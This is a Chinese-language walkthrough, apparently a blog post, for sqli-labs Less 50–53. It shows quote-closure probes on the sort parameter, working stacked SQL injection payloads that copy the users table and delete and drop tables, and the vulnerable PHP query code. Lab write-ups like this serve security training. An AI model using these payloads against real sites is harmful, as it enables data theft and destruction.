sqli-labs 通关指南:Less 50 ~ 53

Less 50 ~ 53 和 Less 46 ~ 49 的注入方法完全一样,但是这 4 个 Less 可以进行堆叠注入。

目录

Less 50#

判断注入类型#

输入正常的参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页返回错误信息。

Copy Highlighter-hljs
?sort=1'


将后面的内容注释掉,网页返回错误的信息。进行下面的所有测试,得出此处存在数值型注入。

Copy Highlighter-hljs
?sort=1'--+
?sort=1')--+
?sort=1'))--+
?sort=1"--+
?sort=1")--+
?sort=1"))--+

堆叠注入#

和 Less 46 一样使用报错注入或时间注入就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

Copy Highlighter-hljs
?sort=1;CREATE TABLE WhiteMoon LIKE users;--+
?sort=1;INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1;DELETE FROM WhiteMoon;--+
?sort=1;DROP TABLE WhiteMoon;--+

SQL 查询语句#

Copy Highlighter-hljs
$sql = "SELECT * FROM users ORDER BY $id";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
      ?>
      <center>
      <font color= "#00FF00" size="4">
		
      <table   border=1'>
      <tr>
            <th>&nbsp;ID&nbsp;</th>
            <th>&nbsp;USERNAME&nbsp;  </th>
            <th>&nbsp;PASSWORD&nbsp;  </th>
      </tr>
      </font>
      </font>
      <?php
      /* store first result set */
      if ($result = mysqli_store_result($con1))
      {
            while($row = mysqli_fetch_row($result))
            {
	          echo '<font color= "#00FF11" size="3">';		
		  echo "<tr>";
		  echo "<td>";
		  printf("%s", $row[0]);
		  echo "</td>";
		  echo "<td>";
		  printf("%s", $row[1]);
		  echo "</td>";
	          echo "<td>";
		  printf("%s", $row[2]);
		  echo "</td>";
		  echo "</tr>";
		  echo "</font>";
	    }
      }
      echo "</table>";
}

Less 51#

判断注入类型#

输入正常参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页返回错误信息。

Copy Highlighter-hljs
?sort=1'

将后面的内容注释掉,网页返回正常的信息,得出此处存在单引号闭合的字符型注入。

Copy Highlighter-hljs
?sort=1'--+

堆叠注入#

和 Less 47 一样使用报错注入或时间注入就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

Copy Highlighter-hljs
?sort=1';CREATE TABLE WhiteMoon LIKE users;--+
?sort=1';INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1';DELETE FROM WhiteMoon;--+
?sort=1';DROP TABLE WhiteMoon;--+

SQL 查询语句#

Copy Highlighter-hljs
$sql="SELECT * FROM users ORDER BY '$id'";

Less 52#

判断注入类型#

输入正常参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页无回显。

Copy Highlighter-hljs
?sort=1'


将后面的内容注释掉,网页无回显。进行下面的所有测试,得出此处存在数值型的盲注。

Copy Highlighter-hljs
?sort=1'--+
?sort=1')--+
?sort=1'))--+
?sort=1"--+
?sort=1")--+
?sort=1"))--+

堆叠注入#

和 Less 48 一样使用时间盲注就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

Copy Highlighter-hljs
?sort=1;CREATE TABLE WhiteMoon LIKE users;--+
?sort=1;INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1;DELETE FROM WhiteMoon;--+
?sort=1;DROP TABLE WhiteMoon;--+

SQL 查询语句#

Copy Highlighter-hljs
$sql = "SELECT * FROM users ORDER BY $id";

Less 53#

判断注入类型#

输入正常参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页无回显。

Copy Highlighter-hljs
?sort=1'


将后面的内容注释掉,网页用户名列表,得出此处存在单引号闭合的字符型的盲注。

Copy Highlighter-hljs
?sort=1'--+

堆叠注入#

和 Less 49 一样使用时间盲注就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

Copy Highlighter-hljs
?sort=1';CREATE TABLE WhiteMoon LIKE users;--+
?sort=1';INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1';DELETE FROM WhiteMoon;--+
?sort=1';DROP TABLE WhiteMoon;--+

SQL 查询语句#

Copy Highlighter-hljs
$sql="SELECT * FROM users ORDER BY '$id'";
posted @   乌漆WhiteMoon  阅读(1177)  评论(0编辑  收藏  举报
编辑推荐:
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
· 没有源码,如何修改代码逻辑?
阅读排行:
· 全程不用写代码,我用AI程序员写了一个飞机大战
· DeepSeek 开源周回顾「GitHub 热点速览」
· 记一次.NET内存居高不下排查解决与启示
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· .NET10 - 预览版1新功能体验(一)
点击右上角即可分享
微信分享提示
AI FOR CODE 大赛
CONTENTS